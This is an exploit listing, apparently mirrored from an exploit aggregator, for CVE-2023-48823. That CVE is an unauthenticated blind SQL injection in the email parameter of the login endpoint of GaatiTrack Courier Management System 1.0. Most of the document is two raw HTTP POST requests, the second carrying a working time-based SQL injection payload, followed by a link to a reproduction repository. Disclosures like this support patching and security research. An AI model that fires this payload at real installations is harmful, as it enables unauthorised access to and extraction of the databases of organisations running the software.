Exploit for GaatiTrack Courier Management System 1.0 SQL Injection CVE-2023-48823

Name: Exploit for GaatiTrack Courier Management System 1.0 SQL Injection CVE-2023-48823
Rating: 5 (227 reviews)
2023-12-04 | CVSS 7.4
## https://sploitus.com/exploit?id=PACKETSTORM:176030
# Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection  
# Date: 13/11/2023  
# Exploit Author: BugsBD Limited  
# Discover by: Rahad Chowdhury  
# Vendor Homepage: https://www.mayurik.com/  
# Software Link:  
https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php  
# Version: v1.0  
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56  
# CVE: CVE-2023-48823  
  
Descriptions:  
Blind SQL injection in ajax.php in GaatiTrack Courier Management  
System v1.0 allows an unauthenticated attacker to insert malicious SQL  
queries via email parameter.  
  
  
Steps to Reproduce:  
  
1. Request:  
  
POST /gaatitrack/ajax.php?action=login HTTP/1.1  
Host: 192.168.1.74  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/119.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 83  
Origin: http://192.168.1.74  
Connection: close  
Referer: http://192.168.1.74/gaatitrack/login.php  
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;  
KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;  
KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc  
  
email=test%40test.com&password=123456  
  
2. Now use blind sqli query after email parameter. So your request data will be:  
  
POST /gaatitrack/ajax.php?action=login HTTP/1.1  
Host: 192.168.1.74  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/119.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 83  
Origin: http://192.168.1.74  
Connection: close  
Referer: http://192.168.1.74/gaatitrack/login.php  
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;  
KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;  
KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc  
  
email=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456  
  
## Reproduce:  
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)